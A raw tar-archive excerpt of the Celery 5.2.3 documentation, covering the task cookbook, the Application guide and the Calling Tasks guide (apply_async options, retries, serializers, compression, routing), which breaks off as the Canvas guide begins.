pickleable pid pidbox pidfile pidfiles pluggable poller pre prefetch prefetched prefetching prefork preload preloading prepend prepended programmatically proj protobuf rdb reStructured rebased rebasing redelivered redelivery reentrancy reentrant refactor refactored refactoring referenceable regex regexes reloader resize resized resizing rtype runlevel runtime screenshot screenshots semipredicate semipredicates serializable serialized serializer serializers serializes serializing starmap stderr stdlib stdout subclasses subclassing submodule subtask subtasks supervisord symlink symlinked symlinks taskset timezones tracebacks tuple tuples uid Łukasz umask unacked undeliverable unencrypted unlink unlinked unlinks unmanaged unorderable unpickleable unpickled unregister unrepresentable unroutable untrusted username usernames utcoffset utils versa versioning wbits weakref weakrefs webhook webhooks writable yaml metavar const nargs dest questionark amongst requeue wildcard ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6757545 celery-5.2.3/docs/templates/0000775000175000017500000000000000000000000015623 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/templates/readme.txt0000664000175000017500000000225500000000000017625 0ustar00asifasif00000000000000.. image:: http://docs.celeryproject.org/en/latest/_images/celery-banner-small.png |build-status| |license| |wheel| |pyversion| |pyimp| .. include:: ../includes/introduction.txt .. include:: ../includes/installation.txt .. include:: ../includes/resources.txt .. |build-status| image:: https://secure.travis-ci.org/celery/celery.png?branch=master :alt: Build status :target: https://travis-ci.org/celery/celery .. |coverage| image:: https://codecov.io/github/celery/celery/coverage.svg?branch=master :target: https://codecov.io/github/celery/celery?branch=master .. |license| image:: https://img.shields.io/pypi/l/celery.svg :alt: BSD License :target: https://opensource.org/licenses/BSD-3-Clause .. |wheel| image:: https://img.shields.io/pypi/wheel/celery.svg :alt: Celery can be installed via wheel :target: https://pypi.org/project/celery/ .. |pyversion| image:: https://img.shields.io/pypi/pyversions/celery.svg :alt: Supported Python versions. :target: https://pypi.org/project/celery/ .. |pyimp| image:: https://img.shields.io/pypi/implementation/celery.svg :alt: Support Python implementations. :target: https://pypi.org/project/celery/ ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.6757545 celery-5.2.3/docs/tutorials/0000775000175000017500000000000000000000000015653 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/tutorials/daemonizing.html0000664000175000017500000000012600000000000021044 0ustar00asifasif00000000000000Moved ===== This document has been moved into the userguide. See :ref:`daemonizing` ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/tutorials/debugging.html0000664000175000017500000000013300000000000020471 0ustar00asifasif00000000000000Moved ===== This document has been moved into the userguide. See :ref:`guide-debugging`. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/tutorials/index.rst0000664000175000017500000000017100000000000017513 0ustar00asifasif00000000000000=========== Tutorials =========== :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 task-cookbook ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/tutorials/task-cookbook.rst0000664000175000017500000000531600000000000021160 0ustar00asifasif00000000000000.. _cookbook-tasks: ================ Task Cookbook ================ .. contents:: :local: .. _cookbook-task-serial: Ensuring a task is only executed one at a time ============================================== You can accomplish this by using a lock. In this example we'll be using the cache framework to set a lock that's accessible for all workers. It's part of an imaginary RSS feed importer called `djangofeeds`. The task takes a feed URL as a single argument, and imports that feed into a Django model called `Feed`. We ensure that it's not possible for two or more workers to import the same feed at the same time by setting a cache key consisting of the MD5 check-sum of the feed URL. The cache key expires after some time in case something unexpected happens, and something always will... For this reason your tasks run-time shouldn't exceed the timeout. .. note:: In order for this to work correctly you need to be using a cache backend where the ``.add`` operation is atomic. ``memcached`` is known to work well for this purpose. .. code-block:: python import time from celery import task from celery.utils.log import get_task_logger from contextlib import contextmanager from django.core.cache import cache from hashlib import md5 from djangofeeds.models import Feed logger = get_task_logger(__name__) LOCK_EXPIRE = 60 * 10 # Lock expires in 10 minutes @contextmanager def memcache_lock(lock_id, oid): timeout_at = time.monotonic() + LOCK_EXPIRE - 3 # cache.add fails if the key already exists status = cache.add(lock_id, oid, LOCK_EXPIRE) try: yield status finally: # memcache delete is very slow, but we have to use it to take # advantage of using add() for atomic locking if time.monotonic() < timeout_at and status: # don't release the lock if we exceeded the timeout # to lessen the chance of releasing an expired lock # owned by someone else # also don't release the lock if we didn't acquire it cache.delete(lock_id) @task(bind=True) def import_feed(self, feed_url): # The cache key consists of the task name and the MD5 digest # of the feed URL. feed_url_hexdigest = md5(feed_url).hexdigest() lock_id = '{0}-lock-{1}'.format(self.name, feed_url_hexdigest) logger.debug('Importing feed: %s', feed_url) with memcache_lock(lock_id, self.app.oid) as acquired: if acquired: return Feed.objects.import_feed(feed_url).url logger.debug( 'Feed %s is already being imported by another worker', feed_url) ././@PaxHeader0000000000000000000000000000003300000000000011451 xustar000000000000000027 mtime=1640757094.699755 celery-5.2.3/docs/userguide/0000775000175000017500000000000000000000000015621 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/application.rst0000664000175000017500000003460500000000000020666 0ustar00asifasif00000000000000.. _guide-app: ============= Application ============= .. contents:: :local: :depth: 1 The Celery library must be instantiated before use, this instance is called an application (or *app* for short). The application is thread-safe so that multiple Celery applications with different configurations, components, and tasks can co-exist in the same process space. Let's create one now: .. code-block:: pycon >>> from celery import Celery >>> app = Celery() >>> app The last line shows the textual representation of the application: including the name of the app class (``Celery``), the name of the current main module (``__main__``), and the memory address of the object (``0x100469fd0``). Main Name ========= Only one of these is important, and that's the main module name. Let's look at why that is. When you send a task message in Celery, that message won't contain any source code, but only the name of the task you want to execute. This works similarly to how host names work on the internet: every worker maintains a mapping of task names to their actual functions, called the *task registry*. Whenever you define a task, that task will also be added to the local registry: .. code-block:: pycon >>> @app.task ... def add(x, y): ... return x + y >>> add <@task: __main__.add> >>> add.name __main__.add >>> app.tasks['__main__.add'] <@task: __main__.add> and there you see that ``__main__`` again; whenever Celery isn't able to detect what module the function belongs to, it uses the main module name to generate the beginning of the task name. This is only a problem in a limited set of use cases: #. If the module that the task is defined in is run as a program. #. If the application is created in the Python shell (REPL). For example here, where the tasks module is also used to start a worker with :meth:`@worker_main`: :file:`tasks.py`: .. code-block:: python from celery import Celery app = Celery() @app.task def add(x, y): return x + y if __name__ == '__main__': app.worker_main() When this module is executed the tasks will be named starting with "``__main__``", but when the module is imported by another process, say to call a task, the tasks will be named starting with "``tasks``" (the real name of the module): .. code-block:: pycon >>> from tasks import add >>> add.name tasks.add You can specify another name for the main module: .. code-block:: pycon >>> app = Celery('tasks') >>> app.main 'tasks' >>> @app.task ... def add(x, y): ... return x + y >>> add.name tasks.add .. seealso:: :ref:`task-names` Configuration ============= There are several options you can set that'll change how Celery works. These options can be set directly on the app instance, or you can use a dedicated configuration module. The configuration is available as :attr:`@conf`: .. code-block:: pycon >>> app.conf.timezone 'Europe/London' where you can also set configuration values directly: .. code-block:: pycon >>> app.conf.enable_utc = True or update several keys at once by using the ``update`` method: .. code-block:: python >>> app.conf.update( ... enable_utc=True, ... timezone='Europe/London', ...) The configuration object consists of multiple dictionaries that are consulted in order: #. Changes made at run-time. #. The configuration module (if any) #. The default configuration (:mod:`celery.app.defaults`). You can even add new default sources by using the :meth:`@add_defaults` method. .. seealso:: Go to the :ref:`Configuration reference ` for a complete listing of all the available settings, and their default values. ``config_from_object`` ---------------------- The :meth:`@config_from_object` method loads configuration from a configuration object. This can be a configuration module, or any object with configuration attributes. Note that any configuration that was previously set will be reset when :meth:`~@config_from_object` is called. If you want to set additional configuration you should do so after. Example 1: Using the name of a module ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The :meth:`@config_from_object` method can take the fully qualified name of a Python module, or even the name of a Python attribute, for example: ``"celeryconfig"``, ``"myproj.config.celery"``, or ``"myproj.config:CeleryConfig"``: .. code-block:: python from celery import Celery app = Celery() app.config_from_object('celeryconfig') The ``celeryconfig`` module may then look like this: :file:`celeryconfig.py`: .. code-block:: python enable_utc = True timezone = 'Europe/London' and the app will be able to use it as long as ``import celeryconfig`` is possible. Example 2: Passing an actual module object ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can also pass an already imported module object, but this isn't always recommended. .. tip:: Using the name of a module is recommended as this means the module does not need to be serialized when the prefork pool is used. If you're experiencing configuration problems or pickle errors then please try using the name of a module instead. .. code-block:: python import celeryconfig from celery import Celery app = Celery() app.config_from_object(celeryconfig) Example 3: Using a configuration class/object ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python from celery import Celery app = Celery() class Config: enable_utc = True timezone = 'Europe/London' app.config_from_object(Config) # or using the fully qualified name of the object: # app.config_from_object('module:Config') ``config_from_envvar`` ---------------------- The :meth:`@config_from_envvar` takes the configuration module name from an environment variable For example -- to load configuration from a module specified in the environment variable named :envvar:`CELERY_CONFIG_MODULE`: .. code-block:: python import os from celery import Celery #: Set default configuration module name os.environ.setdefault('CELERY_CONFIG_MODULE', 'celeryconfig') app = Celery() app.config_from_envvar('CELERY_CONFIG_MODULE') You can then specify the configuration module to use via the environment: .. code-block:: console $ CELERY_CONFIG_MODULE="celeryconfig.prod" celery worker -l INFO .. _app-censored-config: Censored configuration ---------------------- If you ever want to print out the configuration, as debugging information or similar, you may also want to filter out sensitive information like passwords and API keys. Celery comes with several utilities useful for presenting the configuration, one is :meth:`~celery.app.utils.Settings.humanize`: .. code-block:: pycon >>> app.conf.humanize(with_defaults=False, censored=True) This method returns the configuration as a tabulated string. This will only contain changes to the configuration by default, but you can include the built-in default keys and values by enabling the ``with_defaults`` argument. If you instead want to work with the configuration as a dictionary, you can use the :meth:`~celery.app.utils.Settings.table` method: .. code-block:: pycon >>> app.conf.table(with_defaults=False, censored=True) Please note that Celery won't be able to remove all sensitive information, as it merely uses a regular expression to search for commonly named keys. If you add custom settings containing sensitive information you should name the keys using a name that Celery identifies as secret. A configuration setting will be censored if the name contains any of these sub-strings: ``API``, ``TOKEN``, ``KEY``, ``SECRET``, ``PASS``, ``SIGNATURE``, ``DATABASE`` Laziness ======== The application instance is lazy, meaning it won't be evaluated until it's actually needed. Creating a :class:`@Celery` instance will only do the following: #. Create a logical clock instance, used for events. #. Create the task registry. #. Set itself as the current app (but not if the ``set_as_current`` argument was disabled) #. Call the :meth:`@on_init` callback (does nothing by default). The :meth:`@task` decorators don't create the tasks at the point when the task is defined, instead it'll defer the creation of the task to happen either when the task is used, or after the application has been *finalized*, This example shows how the task isn't created until you use the task, or access an attribute (in this case :meth:`repr`): .. code-block:: pycon >>> @app.task >>> def add(x, y): ... return x + y >>> type(add) >>> add.__evaluated__() False >>> add # <-- causes repr(add) to happen <@task: __main__.add> >>> add.__evaluated__() True *Finalization* of the app happens either explicitly by calling :meth:`@finalize` -- or implicitly by accessing the :attr:`@tasks` attribute. Finalizing the object will: #. Copy tasks that must be shared between apps Tasks are shared by default, but if the ``shared`` argument to the task decorator is disabled, then the task will be private to the app it's bound to. #. Evaluate all pending task decorators. #. Make sure all tasks are bound to the current app. Tasks are bound to an app so that they can read default values from the configuration. .. _default-app: .. topic:: The "default app" Celery didn't always have applications, it used to be that there was only a module-based API. A compatibility API was available at the old location until the release of Celery 5.0, but has been removed. Celery always creates a special app - the "default app", and this is used if no custom application has been instantiated. The :mod:`celery.task` module is no longer available. Use the methods on the app instance, not the module based API: .. code-block:: python from celery.task import Task # << OLD Task base class. from celery import Task # << NEW base class. Breaking the chain ================== While it's possible to depend on the current app being set, the best practice is to always pass the app instance around to anything that needs it. I call this the "app chain", since it creates a chain of instances depending on the app being passed. The following example is considered bad practice: .. code-block:: python from celery import current_app class Scheduler: def run(self): app = current_app Instead it should take the ``app`` as an argument: .. code-block:: python class Scheduler: def __init__(self, app): self.app = app Internally Celery uses the :func:`celery.app.app_or_default` function so that everything also works in the module-based compatibility API .. code-block:: python from celery.app import app_or_default class Scheduler: def __init__(self, app=None): self.app = app_or_default(app) In development you can set the :envvar:`CELERY_TRACE_APP` environment variable to raise an exception if the app chain breaks: .. code-block:: console $ CELERY_TRACE_APP=1 celery worker -l INFO .. topic:: Evolving the API Celery has changed a lot from 2009 since it was initially created. For example, in the beginning it was possible to use any callable as a task: .. code-block:: pycon def hello(to): return 'hello {0}'.format(to) >>> from celery.execute import apply_async >>> apply_async(hello, ('world!',)) or you could also create a ``Task`` class to set certain options, or override other behavior .. code-block:: python from celery import Task from celery.registry import tasks class Hello(Task): queue = 'hipri' def run(self, to): return 'hello {0}'.format(to) tasks.register(Hello) >>> Hello.delay('world!') Later, it was decided that passing arbitrary call-able's was an anti-pattern, since it makes it very hard to use serializers other than pickle, and the feature was removed in 2.0, replaced by task decorators: .. code-block:: python from celery import app @app.task(queue='hipri') def hello(to): return 'hello {0}'.format(to) Abstract Tasks ============== All tasks created using the :meth:`@task` decorator will inherit from the application's base :attr:`~@Task` class. You can specify a different base class using the ``base`` argument: .. code-block:: python @app.task(base=OtherTask): def add(x, y): return x + y To create a custom task class you should inherit from the neutral base class: :class:`celery.Task`. .. code-block:: python from celery import Task class DebugTask(Task): def __call__(self, *args, **kwargs): print('TASK STARTING: {0.name}[{0.request.id}]'.format(self)) return self.run(*args, **kwargs) .. tip:: If you override the task's ``__call__`` method, then it's very important that you also call ``self.run`` to execute the body of the task. Do not call ``super().__call__``. The ``__call__`` method of the neutral base class :class:`celery.Task` is only present for reference. For optimization, this has been unrolled into ``celery.app.trace.build_tracer.trace_task`` which calls ``run`` directly on the custom task class if no ``__call__`` method is defined. The neutral base class is special because it's not bound to any specific app yet. Once a task is bound to an app it'll read configuration to set default values, and so on. To realize a base class you need to create a task using the :meth:`@task` decorator: .. code-block:: python @app.task(base=DebugTask) def add(x, y): return x + y It's even possible to change the default base class for an application by changing its :meth:`@Task` attribute: .. code-block:: pycon >>> from celery import Celery, Task >>> app = Celery() >>> class MyBaseTask(Task): ... queue = 'hipri' >>> app.Task = MyBaseTask >>> app.Task >>> @app.task ... def add(x, y): ... return x + y >>> add <@task: __main__.add> >>> add.__class__.mro() [>, , , ] ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/calling.rst0000664000175000017500000005532000000000000017771 0ustar00asifasif00000000000000.. _guide-calling: =============== Calling Tasks =============== .. contents:: :local: :depth: 1 .. _calling-basics: Basics ====== This document describes Celery's uniform "Calling API" used by task instances and the :ref:`canvas `. The API defines a standard set of execution options, as well as three methods: - ``apply_async(args[, kwargs[, …]])`` Sends a task message. - ``delay(*args, **kwargs)`` Shortcut to send a task message, but doesn't support execution options. - *calling* (``__call__``) Applying an object supporting the calling API (e.g., ``add(2, 2)``) means that the task will not be executed by a worker, but in the current process instead (a message won't be sent). .. _calling-cheat: .. topic:: Quick Cheat Sheet - ``T.delay(arg, kwarg=value)`` Star arguments shortcut to ``.apply_async``. (``.delay(*args, **kwargs)`` calls ``.apply_async(args, kwargs)``). - ``T.apply_async((arg,), {'kwarg': value})`` - ``T.apply_async(countdown=10)`` executes in 10 seconds from now. - ``T.apply_async(eta=now + timedelta(seconds=10))`` executes in 10 seconds from now, specified using ``eta`` - ``T.apply_async(countdown=60, expires=120)`` executes in one minute from now, but expires after 2 minutes. - ``T.apply_async(expires=now + timedelta(days=2))`` expires in 2 days, set using :class:`~datetime.datetime`. Example ------- The :meth:`~@Task.delay` method is convenient as it looks like calling a regular function: .. code-block:: python task.delay(arg1, arg2, kwarg1='x', kwarg2='y') Using :meth:`~@Task.apply_async` instead you have to write: .. code-block:: python task.apply_async(args=[arg1, arg2], kwargs={'kwarg1': 'x', 'kwarg2': 'y'}) .. sidebar:: Tip If the task isn't registered in the current process you can use :meth:`~@send_task` to call the task by name instead. So `delay` is clearly convenient, but if you want to set additional execution options you have to use ``apply_async``. The rest of this document will go into the task execution options in detail. All examples use a task called `add`, returning the sum of two arguments: .. code-block:: python @app.task def add(x, y): return x + y .. topic:: There's another way… You'll learn more about this later while reading about the :ref:`Canvas `, but :class:`~celery.signature`'s are objects used to pass around the signature of a task invocation, (for example to send it over the network), and they also support the Calling API: .. code-block:: python task.s(arg1, arg2, kwarg1='x', kwargs2='y').apply_async() .. _calling-links: Linking (callbacks/errbacks) ============================ Celery supports linking tasks together so that one task follows another. The callback task will be applied with the result of the parent task as a partial argument: .. code-block:: python add.apply_async((2, 2), link=add.s(16)) .. sidebar:: What's ``s``? The ``add.s`` call used here is called a signature. If you don't know what they are you should read about them in the :ref:`canvas guide `. There you can also learn about :class:`~celery.chain`: a simpler way to chain tasks together. In practice the ``link`` execution option is considered an internal primitive, and you'll probably not use it directly, but use chains instead. Here the result of the first task (4) will be sent to a new task that adds 16 to the previous result, forming the expression :math:`(2 + 2) + 16 = 20` You can also cause a callback to be applied if task raises an exception (*errback*). The worker won't actually call the errback as a task, but will instead call the errback function directly so that the raw request, exception and traceback objects can be passed to it. This is an example error callback: .. code-block:: python @app.task def error_handler(request, exc, traceback): print('Task {0} raised exception: {1!r}\n{2!r}'.format( request.id, exc, traceback)) it can be added to the task using the ``link_error`` execution option: .. code-block:: python add.apply_async((2, 2), link_error=error_handler.s()) In addition, both the ``link`` and ``link_error`` options can be expressed as a list: .. code-block:: python add.apply_async((2, 2), link=[add.s(16), other_task.s()]) The callbacks/errbacks will then be called in order, and all callbacks will be called with the return value of the parent task as a partial argument. .. _calling-on-message: On message ========== Celery supports catching all states changes by setting on_message callback. For example for long-running tasks to send task progress you can do something like this: .. code-block:: python @app.task(bind=True) def hello(self, a, b): time.sleep(1) self.update_state(state="PROGRESS", meta={'progress': 50}) time.sleep(1) self.update_state(state="PROGRESS", meta={'progress': 90}) time.sleep(1) return 'hello world: %i' % (a+b) .. code-block:: python def on_raw_message(body): print(body) a, b = 1, 1 r = hello.apply_async(args=(a, b)) print(r.get(on_message=on_raw_message, propagate=False)) Will generate output like this: .. code-block:: text {'task_id': '5660d3a3-92b8-40df-8ccc-33a5d1d680d7', 'result': {'progress': 50}, 'children': [], 'status': 'PROGRESS', 'traceback': None} {'task_id': '5660d3a3-92b8-40df-8ccc-33a5d1d680d7', 'result': {'progress': 90}, 'children': [], 'status': 'PROGRESS', 'traceback': None} {'task_id': '5660d3a3-92b8-40df-8ccc-33a5d1d680d7', 'result': 'hello world: 10', 'children': [], 'status': 'SUCCESS', 'traceback': None} hello world: 10 .. _calling-eta: ETA and Countdown ================= The ETA (estimated time of arrival) lets you set a specific date and time that is the earliest time at which your task will be executed. `countdown` is a shortcut to set ETA by seconds into the future. .. code-block:: pycon >>> result = add.apply_async((2, 2), countdown=3) >>> result.get() # this takes at least 3 seconds to return 20 The task is guaranteed to be executed at some time *after* the specified date and time, but not necessarily at that exact time. Possible reasons for broken deadlines may include many items waiting in the queue, or heavy network latency. To make sure your tasks are executed in a timely manner you should monitor the queue for congestion. Use Munin, or similar tools, to receive alerts, so appropriate action can be taken to ease the workload. See :ref:`monitoring-munin`. While `countdown` is an integer, `eta` must be a :class:`~datetime.datetime` object, specifying an exact date and time (including millisecond precision, and timezone information): .. code-block:: pycon >>> from datetime import datetime, timedelta >>> tomorrow = datetime.utcnow() + timedelta(days=1) >>> add.apply_async((2, 2), eta=tomorrow) .. warning:: When using RabbitMQ as a message broker when specifying a ``countdown`` over 15 minutes, you may encounter the problem that the worker terminates with an :exc:`~amqp.exceptions.PreconditionFailed` error will be raised: .. code-block:: pycon amqp.exceptions.PreconditionFailed: (0, 0): (406) PRECONDITION_FAILED - consumer ack timed out on channel In RabbitMQ since version 3.8.15 the default value for ``consumer_timeout`` is 15 minutes. Since version 3.8.17 it was increased to 30 minutes. If a consumer does not ack its delivery for more than the timeout value, its channel will be closed with a ``PRECONDITION_FAILED`` channel exception. See `Delivery Acknowledgement Timeout`_ for more information. To solve the problem, in RabbitMQ configuration file ``rabbitmq.conf`` you should specify the ``consumer_timeout`` parameter greater than or equal to your countdown value. For example, you can specify a very large value of ``consumer_timeout = 31622400000``, which is equal to 1 year in milliseconds, to avoid problems in the future. .. _`Delivery Acknowledgement Timeout`: https://www.rabbitmq.com/consumers.html#acknowledgement-timeout .. _calling-expiration: Expiration ========== The `expires` argument defines an optional expiry time, either as seconds after task publish, or a specific date and time using :class:`~datetime.datetime`: .. code-block:: pycon >>> # Task expires after one minute from now. >>> add.apply_async((10, 10), expires=60) >>> # Also supports datetime >>> from datetime import datetime, timedelta >>> add.apply_async((10, 10), kwargs, ... expires=datetime.now() + timedelta(days=1) When a worker receives an expired task it will mark the task as :state:`REVOKED` (:exc:`~@TaskRevokedError`). .. _calling-retry: Message Sending Retry ===================== Celery will automatically retry sending messages in the event of connection failure, and retry behavior can be configured -- like how often to retry, or a maximum number of retries -- or disabled all together. To disable retry you can set the ``retry`` execution option to :const:`False`: .. code-block:: python add.apply_async((2, 2), retry=False) .. topic:: Related Settings .. hlist:: :columns: 2 - :setting:`task_publish_retry` - :setting:`task_publish_retry_policy` Retry Policy ------------ A retry policy is a mapping that controls how retries behave, and can contain the following keys: - `max_retries` Maximum number of retries before giving up, in this case the exception that caused the retry to fail will be raised. A value of :const:`None` means it will retry forever. The default is to retry 3 times. - `interval_start` Defines the number of seconds (float or integer) to wait between retries. Default is 0 (the first retry will be instantaneous). - `interval_step` On each consecutive retry this number will be added to the retry delay (float or integer). Default is 0.2. - `interval_max` Maximum number of seconds (float or integer) to wait between retries. Default is 0.2. For example, the default policy correlates to: .. code-block:: python add.apply_async((2, 2), retry=True, retry_policy={ 'max_retries': 3, 'interval_start': 0, 'interval_step': 0.2, 'interval_max': 0.2, }) the maximum time spent retrying will be 0.4 seconds. It's set relatively short by default because a connection failure could lead to a retry pile effect if the broker connection is down -- For example, many web server processes waiting to retry, blocking other incoming requests. .. _calling-connection-errors: Connection Error Handling ========================= When you send a task and the message transport connection is lost, or the connection cannot be initiated, an :exc:`~kombu.exceptions.OperationalError` error will be raised: .. code-block:: pycon >>> from proj.tasks import add >>> add.delay(2, 2) Traceback (most recent call last): File "", line 1, in File "celery/app/task.py", line 388, in delay return self.apply_async(args, kwargs) File "celery/app/task.py", line 503, in apply_async **options File "celery/app/base.py", line 662, in send_task amqp.send_task_message(P, name, message, **options) File "celery/backends/rpc.py", line 275, in on_task_call maybe_declare(self.binding(producer.channel), retry=True) File "/opt/celery/kombu/kombu/messaging.py", line 204, in _get_channel channel = self._channel = channel() File "/opt/celery/py-amqp/amqp/connection.py", line 272, in connect self.transport.connect() File "/opt/celery/py-amqp/amqp/transport.py", line 100, in connect self._connect(self.host, self.port, self.connect_timeout) File "/opt/celery/py-amqp/amqp/transport.py", line 141, in _connect self.sock.connect(sa) kombu.exceptions.OperationalError: [Errno 61] Connection refused If you have :ref:`retries ` enabled this will only happen after retries are exhausted, or when disabled immediately. You can handle this error too: .. code-block:: pycon >>> from celery.utils.log import get_logger >>> logger = get_logger(__name__) >>> try: ... add.delay(2, 2) ... except add.OperationalError as exc: ... logger.exception('Sending task raised: %r', exc) .. _calling-serializers: Serializers =========== .. sidebar:: Security The pickle module allows for execution of arbitrary functions, please see the :ref:`security guide `. Celery also comes with a special serializer that uses cryptography to sign your messages. Data transferred between clients and workers needs to be serialized, so every message in Celery has a ``content_type`` header that describes the serialization method used to encode it. The default serializer is `JSON`, but you can change this using the :setting:`task_serializer` setting, or for each individual task, or even per message. There's built-in support for `JSON`, :mod:`pickle`, `YAML` and ``msgpack``, and you can also add your own custom serializers by registering them into the Kombu serializer registry .. seealso:: :ref:`Message Serialization ` in the Kombu user guide. Each option has its advantages and disadvantages. json -- JSON is supported in many programming languages, is now a standard part of Python (since 2.6), and is fairly fast to decode using the modern Python libraries, such as :pypi:`simplejson`. The primary disadvantage to JSON is that it limits you to the following data types: strings, Unicode, floats, Boolean, dictionaries, and lists. Decimals and dates are notably missing. Binary data will be transferred using Base64 encoding, increasing the size of the transferred data by 34% compared to an encoding format where native binary types are supported. However, if your data fits inside the above constraints and you need cross-language support, the default setting of JSON is probably your best choice. See http://json.org for more information. .. note:: (From Python official docs https://docs.python.org/3.6/library/json.html) Keys in key/value pairs of JSON are always of the type :class:`str`. When a dictionary is converted into JSON, all the keys of the dictionary are coerced to strings. As a result of this, if a dictionary is converted into JSON and then back into a dictionary, the dictionary may not equal the original one. That is, ``loads(dumps(x)) != x`` if x has non-string keys. pickle -- If you have no desire to support any language other than Python, then using the pickle encoding will gain you the support of all built-in Python data types (except class instances), smaller messages when sending binary files, and a slight speedup over JSON processing. See :mod:`pickle` for more information. yaml -- YAML has many of the same characteristics as json, except that it natively supports more data types (including dates, recursive references, etc.). However, the Python libraries for YAML are a good bit slower than the libraries for JSON. If you need a more expressive set of data types and need to maintain cross-language compatibility, then YAML may be a better fit than the above. See http://yaml.org/ for more information. msgpack -- msgpack is a binary serialization format that's closer to JSON in features. It's very young however, and support should be considered experimental at this point. See http://msgpack.org/ for more information. The encoding used is available as a message header, so the worker knows how to deserialize any task. If you use a custom serializer, this serializer must be available for the worker. The following order is used to decide the serializer used when sending a task: 1. The `serializer` execution option. 2. The :attr:`@-Task.serializer` attribute 3. The :setting:`task_serializer` setting. Example setting a custom serializer for a single task invocation: .. code-block:: pycon >>> add.apply_async((10, 10), serializer='json') .. _calling-compression: Compression =========== Celery can compress messages using the following builtin schemes: - `brotli` brotli is optimized for the web, in particular small text documents. It is most effective for serving static content such as fonts and html pages. To use it, install Celery with: .. code-block:: console $ pip install celery[brotli] - `bzip2` bzip2 creates smaller files than gzip, but compression and decompression speeds are noticeably slower than those of gzip. To use it, please ensure your Python executable was compiled with bzip2 support. If you get the following :class:`ImportError`: .. code-block:: pycon >>> import bz2 Traceback (most recent call last): File "", line 1, in ImportError: No module named 'bz2' it means that you should recompile your Python version with bzip2 support. - `gzip` gzip is suitable for systems that require a small memory footprint, making it ideal for systems with limited memory. It is often used to generate files with the ".tar.gz" extension. To use it, please ensure your Python executable was compiled with gzip support. If you get the following :class:`ImportError`: .. code-block:: pycon >>> import gzip Traceback (most recent call last): File "", line 1, in ImportError: No module named 'gzip' it means that you should recompile your Python version with gzip support. - `lzma` lzma provides a good compression ratio and executes with fast compression and decompression speeds at the expense of higher memory usage. To use it, please ensure your Python executable was compiled with lzma support and that your Python version is 3.3 and above. If you get the following :class:`ImportError`: .. code-block:: pycon >>> import lzma Traceback (most recent call last): File "", line 1, in ImportError: No module named 'lzma' it means that you should recompile your Python version with lzma support. Alternatively, you can also install a backport using: .. code-block:: console $ pip install celery[lzma] - `zlib` zlib is an abstraction of the Deflate algorithm in library form which includes support both for the gzip file format and a lightweight stream format in its API. It is a crucial component of many software systems - Linux kernel and Git VCS just to name a few. To use it, please ensure your Python executable was compiled with zlib support. If you get the following :class:`ImportError`: .. code-block:: pycon >>> import zlib Traceback (most recent call last): File "", line 1, in ImportError: No module named 'zlib' it means that you should recompile your Python version with zlib support. - `zstd` zstd targets real-time compression scenarios at zlib-level and better compression ratios. It's backed by a very fast entropy stage, provided by Huff0 and FSE library. To use it, install Celery with: .. code-block:: console $ pip install celery[zstd] You can also create your own compression schemes and register them in the :func:`kombu compression registry `. The following order is used to decide the compression scheme used when sending a task: 1. The `compression` execution option. 2. The :attr:`@-Task.compression` attribute. 3. The :setting:`task_compression` attribute. Example specifying the compression used when calling a task:: >>> add.apply_async((2, 2), compression='zlib') .. _calling-connections: Connections =========== .. sidebar:: Automatic Pool Support Since version 2.3 there's support for automatic connection pools, so you don't have to manually handle connections and publishers to reuse connections. The connection pool is enabled by default since version 2.5. See the :setting:`broker_pool_limit` setting for more information. You can handle the connection manually by creating a publisher: .. code-block:: python results = [] with add.app.pool.acquire(block=True) as connection: with add.get_publisher(connection) as publisher: try: for args in numbers: res = add.apply_async((2, 2), publisher=publisher) results.append(res) print([res.get() for res in results]) Though this particular example is much better expressed as a group: .. code-block:: pycon >>> from celery import group >>> numbers = [(2, 2), (4, 4), (8, 8), (16, 16)] >>> res = group(add.s(i, j) for i, j in numbers).apply_async() >>> res.get() [4, 8, 16, 32] .. _calling-routing: Routing options =============== Celery can route tasks to different queues. Simple routing (name <-> name) is accomplished using the ``queue`` option:: add.apply_async(queue='priority.high') You can then assign workers to the ``priority.high`` queue by using the workers :option:`-Q ` argument: .. code-block:: console $ celery -A proj worker -l INFO -Q celery,priority.high .. seealso:: Hard-coding queue names in code isn't recommended, the best practice is to use configuration routers (:setting:`task_routes`). To find out more about routing, please see :ref:`guide-routing`. .. _calling-results: Results options =============== You can enable or disable result storage using the :setting:`task_ignore_result` setting or by using the ``ignore_result`` option: .. code-block:: pycon >>> result = add.apply_async((1, 2), ignore_result=True) >>> result.get() None >>> # Do not ignore result (default) ... >>> result = add.apply_async((1, 2), ignore_result=False) >>> result.get() 3 If you'd like to store additional metadata about the task in the result backend set the :setting:`result_extended` setting to ``True``. .. seealso:: For more information on tasks, please see :ref:`guide-tasks`. Advanced Options ---------------- These options are for advanced users who want to take use of AMQP's full routing capabilities. Interested parties may read the :ref:`routing guide `. - exchange Name of exchange (or a :class:`kombu.entity.Exchange`) to send the message to. - routing_key Routing key used to determine. - priority A number between `0` and `255`, where `255` is the highest priority. Supported by: RabbitMQ, Redis (priority reversed, 0 is highest). ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/canvas.rst0000664000175000017500000007416000000000000017636 0ustar00asifasif00000000000000.. _guide-canvas: ============================== Canvas: Designing Work-flows ============================== .. 